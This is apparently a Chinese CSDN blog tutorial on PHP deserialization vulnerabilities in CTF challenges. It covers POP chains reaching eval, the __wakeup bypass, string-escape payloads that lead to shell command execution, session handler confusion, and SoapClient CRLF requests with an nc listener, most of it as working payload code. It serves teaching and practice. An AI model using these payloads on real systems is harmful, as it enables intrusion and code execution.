php反序列化

最新推荐文章于 2024-04-19 17:45:00 发布
最新推荐文章于 2024-04-19 17:45:00 发布
阅读量733 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58624515/article/details/128122597
版权

php反序列化漏洞

序列化是将一个对象转换成字符串,反序列化是将字符串转换成对象,

在ctf的php反序列化中,我们传入参数进行反序列化,意味着我们可以控制对象的中参数的值,以达到获得flag和shell权限的目的

serialize() 将一个对象转换成一个字符串

<?php 
  class info{
  public $name=19;
  }
  $a=new info();
echo serialize($a);

new info()是调用info这个类,运行得到的值如下:

O:4:"info":1:{s:4:"name";i:19;}

第一位:O表示object,i代表数组

第二位:代表对象的长度

第三位:是对象的名称

第四位:是对象的个数

第五位:是变量的数据类型,s代表string,i代表int

第六位:是变量的长度

第七位:是变量的名字

unserialize() 将字符串还原成一个对象

将序列化的内容还原成对象

<?php 
class info{
	public $name='N1ght';
	public $age=17;
	public function a(){
		echo $this->name.' is '.$this->age.' years old';
	}
}
$a=new info();
$a->a();

$a->a();调用info里面的a函数

$this->name调用当前类的变量

我们如何修改里面的值呢

<?php 
class info{
	public $name='N1_ght';
	public $age=17132;
	public function a(){
		echo $this->name.' is '.$this->age.' years old';
	}
}
$a=new info();
$a->a();
echo serialize($a);

先获取序列化的值

O:4:"info":2:{s:4:"name";s:6:"N1_ght";s:3:"age";i:17132;}

然后进行反序列化

<?php 
class info{
	public $name='N1_ght';
	public $age=17132;
	public function a(){
		echo $this->name.' is '.$this->age.' years old';
	}
}
$a=unserialize($_GET['a']);
$a->a();

值就进行了改变

通过这个知识点,我们就可以出一个·题目

<?php
class N1ght{
	public $username;
	public $password;
	public $token;
	public function login(){
		if($this->username==='N1_ght'&&$this->password==='123456'&&$this->token==='admin'){
			include('flag.php');
			echo $flag;
		}else{
			echo 'login failed';
		}
	}
}
$a=unserialize($_GET['a']);
$a->login();
?>

可以看到很简单进行了一个if判断语句,限定了我们输入的值,输入值正确的时候就输出flag

我们构建payload

<?php
class N1ght{
	public $username;
	public $password;
	public $token;
	public function login(){
		if($this->username==='N1_ght'&&$this->password==='123456'&&$this->token==='admin'){
			include('flag.php');
			echo $flag;
		}else{
			echo 'login failed';
		}
	}
}
$a=new N1ght();
$a->username='N1_ght';
$a->password='123456';
$a->token='admin';
echo serialize($a);
?>

$a->xx=xxx 修改N1ght里的username的值为xxx

得到结果:

O:5:"N1ght":3:{s:8:"username";s:6:"N1_ght";s:8:"password";s:6:"123456";s:5:"token";s:5:"admin";}

get方式传入a

验证成功

输出flag

在类中有

public公有变量

private私有变量

protected保护变量

Public、private、protected区别:它们三个的权限不同。public 可以访问所有的类,private 只有当前类可访问,protected 当前类和继承它的类都可访问。

protected
声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀。这里的
\0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。

这也许解释了,为什么如果直接在网址上,传递\0*\0username会报错,因为实际上并不是\0,只是用它来代替ASCII值为0的字符。

必须用python传值才可以。

比如:

O:4:"Name":2:{s:11:"\0*\0username";s:5:"admin";s:11:"\0*\0password";i:100;}

private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。其中 \0 字符也是计算长度的。

如果想放在浏览器中直接提交,我们可以将\0换成%00

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

原文链接:【PHP】反序列化漏洞(又名“PHP对象注入”)_Kal1的博客-CSDN博客

但是当数组值包含如双引号、单引号或冒号等字符时,它们被反序列化后,可能会出现问题。

为了克服这个问题,一个巧妙的技巧是使用base64_encode和base64_decode函数。

$obj=array();//序列化

$s=base64_encode(serialize($obj));

//反序列化

$original=unserialize(base64_decode($s)); 这样也并不是一个非常完美的解决办法,因为base64编码将增加字符串的长度。为了克服这个问题,可以和gzcompress一起使用,如下。

//定义一个用来序列化对象的函数function my_serialize($obj){

return base64_encode(gzcompress(serialize($obj)));

}

//反序列化

function my_unserialize($txt){

return unserialize(gzuncompress(base64_decode($txt)));

}

我们反序列化的时候要传入他的url编码过后的值才能成功,并且不能在外面通过->的方式修改

以private尝试

<?php
class N1ght{
	private $username;
	private $password;
	private $token;
	private function login(){
		if($this->username==='N1_ght'&&$this->password==='123456'&&$this->token==='admin'){
			include('flag.php');
			echo $flag;
		}else{
			echo 'login failed';
		}
	}
}
$a=unserialize($_GET['a']);
$a->login();
?>

payload:

O:5:"N1ght":3:{s:15:"N1ghtusername";s:6:"N1_ght";s:15:"N1ghtpassword";s:6:"123456";s:12:"N1ghttoken";s:5:"admin";}

会发现报错

进行url编码后发现成功

<?php
class N1ght{
	private $username='N1_ght';
	private $password='123456';
	private $token='admin';
	public function login(){
		if($this->username==='N1_ght'&&$this->password==='123456'&&$this->token==='admin'){
			include('flag.php');
			echo $flag;
		}else{
			echo 'login failed';
		}
	}
}
$a=new N1ght();
echo urlencode(serialize($a));
?>

魔法函数

__construct() 创建对象时触发

__destruct() 对象被销毁时触发

__toString() echo和printf时候触发

__wakeup() 调用反序列化时候触发

__sleep() 调用序列化的时候触发

__get() 从不可访问的属性读取数据

__set() 将数据写入不可访问的对象

__call() 在对象上下文中调用不可访问的方法触发

当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用

测试

new A()这个动作触发了

__construct和__destruct

serialize($a)触发了sleep

unserialize($a)触发了__wakeup

$a->a()触发了__call函数

魔法函数__wakeup()绕过

在漏洞CVE-2016-7124当序列化的字符串表示对象属性个数大于真实的属性个数的时候会跳过__wakeup函数的执行

有效版本:

PHP5<5.6.25,PHP7 < 7.0.10

题目:

<?php
class N1_ght{
	public $username;
	public $password;
	public $token;
	public function __wakeup(){
		$this->username='hh';
		$this->password='xx';
		$this->token='user';
		echo "触发了__wakeup函数";
	}
	public function __destruct(){
		if($this->username=='wandou'&&$this->password='123456'&&$this->token=='admin'){
			include('flag.php');
			echo $flag;
		}
	}
}
$a=unserialize($_GET['a']);
?>

要让username和password和token等于一个值,但是unserialize会自动调用wakeup重新赋值,无法成功

payload:

<?php
class N1_ght{
	public $username;
	public $password;
	public $token;
}
$a=new N1_ght();
$a->username='wandou';
$a->password='123456';
$a->token='admin';
echo serialize($a);
?>

O:6:"N1_ght":3:{s:8:"username";s:6:"wandou";s:8:"password";s:6:"123456";s:5:"token";s:5:"admin";}

值为

当他的对象个数大于真实对象个数的时候

直接跳过了wakeup并且不执行

pop链学习

pop链的构造需要找到入口,也就是传入参数的地方,然后通过php的魔法函数来链到可以执行命令或者获得flag的函数

pop链例题

<?php

error_reporting(0);

show_source("pop.php");

class errorr0{

protected $var;

function __construct() {

$this->var = new errorr1();

}

function __destruct() {

$this->var->func();

}

}

class errorr1 {

public $var;

function func() {

echo $this->var;

}

}

class errorr2 {

private $data;

public function func() {

eval($this->data);

}

}

unserialize($_GET['err']);

?>

学习pop链看到的一道题目

分析源代码

error_reporting(0); 关闭报错信息

show_source("pop.php"); 显示页面源代码

class errorr0{ 定义一个类为errorr0

protected $var; 定义受保护的变量,只能在类内部进行修改不能 $a=new errorr0(); $a->var=111

function __construct() { 当类被创建的时候

$this->var = new errorr1(); 这边的var是可以控制的,可以构建pop链,创建一个新的类

}

function __destruct() {

$this->var->func(); 当类被销毁的时候,调用var类中的func函数

}

}

class errorr1 { 定义一个类为error1

public $var; 定义一个公有变量var

function func() { 定义一个func函数

echo $this->var; 这边应该是可控制,但是下面的errorr2需要去调用func函数执行系统命令

}

}

class errorr2 { 声明一个类为errorr2

private $data; 定义一个私有变量data,输入执行的命令

public function func() { 定义一个公有函数func

eval($this->data); 执行系统命令

}

}

我们需要链接到errorr2并且调用里面的func函数

我们看到了

class errorr0{

protected $var;

function __construct() {

$this->var = new errorr1(); 修改成new errorr2()

}

function __destruct() {

$this->var->func(); 当类被销毁的时候,调用var类中的func函数

}

}

payload:

<?php

class errorr0{

protected $var;

function __construct() {

$this->var = new errorr2();

}

function __destruct() {

$this->var->func();

}

}

class errorr1 {

public $var;

function func() {

echo $this->var;

}

}

class errorr2 {

private $data="phpinfo();";

public function func() {

eval($this->data);

}

}

$a=new errorr0();

echo urlencode(serialize($a)); 因为protected和private所以转换url编码

?>

例题2:

看到的一道pop题,源代码:

<?php

error_reporting(0);

show_source("index.php");

class w44m{

private $admin = 'aaa';

protected $passwd = '123456';

public function Getflag(){

if($this->admin === 'w44m' && $this->passwd ==='08067'){

include('flag.php');

echo $flag;

}else{

echo $this->admin;

echo $this->passwd;

echo 'nono';

}

}

}

class w22m{

public $w00m;

public function __destruct(){

echo $this->w00m;

}

}

class w33m{

public $w00m;

public $w22m;

public function __toString(){

$this->w00m->{$this->w22m}();

return 0;

}

}

$w00m = $_GET['w00m'];

unserialize($w00m);

?>

代码分析:

error_reporting(0); 关闭报错

show_source("index.php"); 浏览器显示

分析这个部分可以当pop链的尾部,只要admin==='w44m'并且passwd==='08067'调用Getflag函数就可以获得flag

class w44m{

private $admin = 'aaa';

protected $passwd = '123456';

public function Getflag(){

if($this->admin === 'w44m' && $this->passwd ==='08067'){

include('flag.php');

echo $flag;

}else{

echo $this->admin;

echo $this->passwd;

echo 'nono';

}

}

这个部分可以当pop链的头部

class w22m{

public $w00m;

public function __destruct(){

echo $this->w00m;

}

}

w33m可以调用w44m的Getflag函数

class w33m{

public $w00m;

public $w22m;

public function __toString(){

$this->w00m->{$this->w22m}();

return 0;

}

}

-->w22m::__destruct()-->w33m::__toString()-->w44m()::Getflag()

payload:

<?php

error_reporting(0);

show_source("index.php");

class w44m{

private $admin = 'w44m';

protected $passwd = '08067';

public function Getflag(){

if($this->admin === 'w44m' && $this->passwd ==='08067'){

include('flag.php');

echo $flag;

}else{

echo $this->admin;

echo $this->passwd;

echo 'nono';

}

}

}

class w22m{

public $w00m;

public function __destruct(){

echo $this->w00m;

}

}

class w33m{

public $w00m;

public $w22m;

public function __toString(){

$this->w00m->{$this->w22m}();

return 0;

}

}

$a = new w44m();

$b = new w22m();

$c = new w33m();

$b->w00m=$c;

$c->w00m=$a;

$c->w22m="Getflag";

echo serialize($b)."\n";

echo urlencode(serialize($b));

?>

反序列化字符串逃逸

反序列化字符串逃逸包括增多和减少

一般是str_replace函数触发的

序列化后的字符串在进行反序列化操作时,会以{}两个花括号进行分界线,花括号以外的内容不会被反序列化。

增多

<?php
highlight_file(__FILE__);
function change($str){
	return str_replace("x", "xxxx", $str);
}
$name=$_GET['name'];
$age="I am 11";
$arr=array($name,$age);
print_r(serialize($arr));
echo "<br/>";
$old=change(serialize($arr));
echo "<br/>".$old;
$new=unserialize($old);
var_dump($new);
echo "<br/>此时,age=$new[1]";
if($new[1]=="18"){
	include('flag.php');
	echo $flag;
}
?>

分析下源代码,我们要控制age=18就输出,如何操作age呢

str_replace将x换成了xxxx,发现长度是3里面内容确实xxxxxxxxxxxx等等,这些多余的字符我们可以自己进行拼接序列化

前面有个定义就是:

序列化后的字符串在进行反序列化操作时,会以{}两个花括号进行分界线,花括号以外的内容不会被反序列化。

";i:1;s:2:"18";}

需要逃逸16个字符,我们输入一个x逃逸3个所以payload就是,xxxxxx";i:1;s:2:"18";}aa

成功控制后面的变量,这边的aa是占位符凑到18个逃逸字符

所以增多就是通过str_replace将字符串替换变多,自己构建反序列化的字符加入其中,使自己构建代替生成的,来控制后面变量的值

ctfshow262

<?php
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

放到本地环境调试

需要逃逸的字符串是

";s:5:"token";s:5:"admin";}

27个字符就需要传入27个fuck

fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

然后访问message.php

减少

<?php
highlight_file(__FILE__);
function change($str){
	return str_replace("flag", "x", $str);
}
$name=$_GET['name'];
$age='i am 18 year';
$ye=$_GET['wandou'];
$sys='ls';
$arr=array($name,$age,$ye,$sys);
print_r(serialize($arr));
echo "<br/>";
$old=change(serialize($arr));
echo "<br/>".$old;
$new=unserialize($old);
var_dump($new);
echo "<br/>此时,age=$new[1]";
echo "<br />此时,sys=$new[3]";
echo `$new[3]`;
?>

我们可以通过控制new的第四个变量来执行命令

传入参数

";i:1;s:12:"i am 18 year";i:2;s:58:"

需要逃逸的是这一部分

我们输入12个flag进行逃逸36个字符

成功执行命令

session反序列化

php : a|s:3:"wzk";

php_serialize : a:1:{s:1:"a";s:3:"wzk";}

php_binary : as:3:"wzk";

所以一般是php_serialize存储|a:1:{s:1:"a";s:3:"wzk";}

php触发

ini_set("session.serialize_handler","php_serialize")

ini_set("session.serialize_handler","php")

<?php
highlight_file(__FILE__);
ini_set($_GET['b'],$_GET['c']);
session_start();
$_SESSION['swaggyp'] = $_GET['a'];
echo var_dump($_SESSION);
class student{
    var $name;
    var $age;
    function __wakeup()
    {
        echo "wzk".$this->name;
    }
}

我们的思路是

ini_set('session.serialize_handler','php_serialize')保存|反序列化的值

ini_set('session.serialize_handler','php')触发

<?php
class student{
    var $name;
    var $age;
}
$a = new student();
$a->name =  "swaggyp";
$a->age = "1111";
echo serialize($a);
//O:7:"student":3:{s:4:"name";N;s:3:"age";s:4:"1111";s:4:"nage";s:7:"swaggyp";}

存储

触发

触发成功

反序列化原生类

DirectoryIterator

这个类会创建一个指定目录的迭代器,当遇到echo输出时会触发Directorylterator中的__toString()方法,输出指定目录里面经过排序之后的第一个文件名。

<?php
$a=new DirectoryIterator();
echo $a;
?>

我们可以通过通配符查找flag的文件名

<?php
$a=new DirectoryIterator('glob://*f*');
echo $a;
?>

<?php
$a=new DirectoryIterator('glob://*f*');
foreach($a as $f){
	echo $f->__toString().' ';
}
?>

也可以通过foreach读取全部的文件

FilesystemIterator

这个在用法上和DirectoryIterator一样。

GlobIterator

通过类名也不难看出,这是个自带glob协议的类,所以调用时就不必再加上glob://了

SplFileObject

当用文件目录遍历到了敏感文件时,可以用SplFileObject类,同样通过echo触发SplFileObject中的__toString()方法。(该类不支持通配符,所以必须先获取到完整文件名称才行)除此之外其实SplFileObject类,只能读取文件的第一行内容,如果想要全部读取就需要用到foreach函数,但若题目中没有给出foreach函数的话,就要用伪协议读取文件的内容

<?php
$a=new SplFileObject('ffffllllllaaaag.txt');
echo $a;

<?php
$a=new SplFileObject('ffffllllllaaaag.txt');
foreach($a as $f){
	echo $a->__toString().'<br>';
}

报错类

Error/Exception 触发XSS

绕过哈希值比较

SoapClient类

开启一个监听器

nc -lvvp

这边利用了crlf漏洞,我们可以进行post传参

<?php
$payload='a=b&b=c';
$a=new SoapClient(null,
array(
	'location'=>'http://192.168.126.128:5000/flag.php',
	'uri'=>'http://192.168.126.128:5000/flag.php',
	'user_agent'=>"aaa\r\nCookie:N1ght\r\nContent-type:application/x-www-form-urlencoded\r\nContent-length:".strlen($payload)."\r\n\r\n".$payload)
);
$a->a();

Ni_ght
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
某web题 初次接触序列
weixin_43928140的博客
05-13 1010
记录菜鸡生活的第五天02 首先打开题目 先抓个包看下 看到这个,应该是说username这个东西他要经过md5加密,并且是0开头的字符串,所以我们先百度一个数在md5加密后符合要求的输进去 登进去之后发现是代码审计了 $unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_s...
PHP序列
2ed
10-30 320
文章简介:# PHP序列学习笔记。 目录:# 序列序列 相关函数 1. serialize()函数 2 .unserialize()函数 序列的不同结果 例题:D0g3CTF 总结 参考文献 序列序列# 说到序列,就不得不说序列序列:把对象、数组、字符串等转为字节序列的过程称为序列 序列:把字节序列恢复为对象、数组、字符串...
ctfshowPHP特性
遇事不决冲冲冲
08-23 4355
web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 数组绕过正则表达式,也就是说我们不按规定去
PHP序列【原理+CTF实战】
最新发布
2301_80127209的博客
04-19 776
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列的目的是方便数据的传输和存储,在PHP中,序列序列一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
CTF-web Xman-2018 第四天 WEB习题1
iamsongyu的博客
12-11 1638
例题 localhoost访问 更改x-forwarded-for=127.0.0.1   api调用  http://web.jarvisoj.com:9882/ 目录扫一下没什么特别的东西,看一下源码发现了关键代码 &lt;script&gt; function XHR() { var xhr; try {xhr = new XMLHttpReque...
CTF-PHP序列
m0_65336233的博客
10-18 1263
CTF-PHP序列
复现thinkphp5.1序列漏洞
桃雾雨Rain的博客
05-02 1249
首先写一个控制器: <?php namespace app\index\controller; class Index { public function index() { if(isset($_POST['data'])){ @unserialize($_POST['data']); } highlight_string(file_get_contents(__FILE__)); } }
详解php序列
12-17
最近也是在复习之前学过的内容,感觉对PHP序列的理解更加深了,所以在此总结一下 2 serialize()函数  “所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列一个对象将会...
php序列例题.docx
07-18
PHP 序列详解 PHP 序列是指将序列的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列序列的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 序列的过程...
浅析PHP序列中过滤函数使用不当导致的对象注入问题
12-20
#### 正常的序列语句是这样的 $a=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”abcdef”;}’; 但是如果写成这样 $b=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”...
PHP常见的序列序列操作实例分析
10-16
主要介绍了PHP常见的序列序列操作,结合实例形式分析了php使用serialize()及unserialize()进行序列序列相关操作技巧及注意事项,需要的朋友可以参考下
php unserialize实例,php函数serialize()与unserialize()用法实例详解
weixin_39562234的博客
03-16 443
本节内容:php函数serialize()与unserialize()用法php函数serialize():这个函数作用就是序列数据,返回一个可存储的字符串,该函数有利于存储或传递PHP的值,同时不丢失其类型和结构。在cms数据库中经常看到这样的结构。一般将复杂或者数据量多而没有必要分开存储的数据封装成一个多维数组通过serialize()转成字符串,然后存进数据库,需要时再拿出来转成数组再用,...
php序列漏洞 实例_php序列漏洞总结
weixin_29128689的博客
03-09 514
0x00 概述php允许保存一个对象方便以后重用,这个过程被称为序列。serialize可以将对象转换为字符串并且在转换中可以保存当前变量的值。unserialize则可以将serialize生成的字符串变换回对象。0x01序列类型boolean:b:1;//Trueb:0;//Falseintegeri:1;doubled:1.23456NULLN;strings:”abcdef”...
ctf php沙箱,详谈CTF中常出现的PHP序列漏洞
weixin_39968724的博客
03-16 983
0x01什么是PHP序列序列PHP序列是一种把变量或对象以字符串形式转以方便储存和传输的方法在PHP中,序列用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。比方来说,我现在有一个类,我需要通过接口进行数据传输,或存储至数据库中以备将来使用,同时又想保持其结构,让接收方接收或数据库读数据时恢复其原来的结构,就需要通过序列将对象按照一定格式转为字符串的形式来进行传输简单...
使用 Fuzztag 一键爆破序列
阿道夫的博客
03-06 264
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
PHP的序列序列
一颗小白菜的博客
08-17 539
PHP程序执行结束以后会将文件中的变量和内容释放掉, 如果一个程序想要的调用之前程序的变量,但是之前的程序已经执行完毕,所有的变量和内容都被释放,那该如何操作呢?这时候就可以通过序列序列保存程序中的对象,给其他程序使用。php序列可以将对象转换成字符串,但只序列属性,不序列方法。unserialize()函数的变量可控,php文件中存在可利用的类,类中有魔法函数。[网鼎杯 2020 青龙组]AreUSerialz(BUUCTF)​PHP序列序列函数达到序列序列的目的。...
ctf-show序列
m0_74097148的博客
03-15 358
便造成了自动序列的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值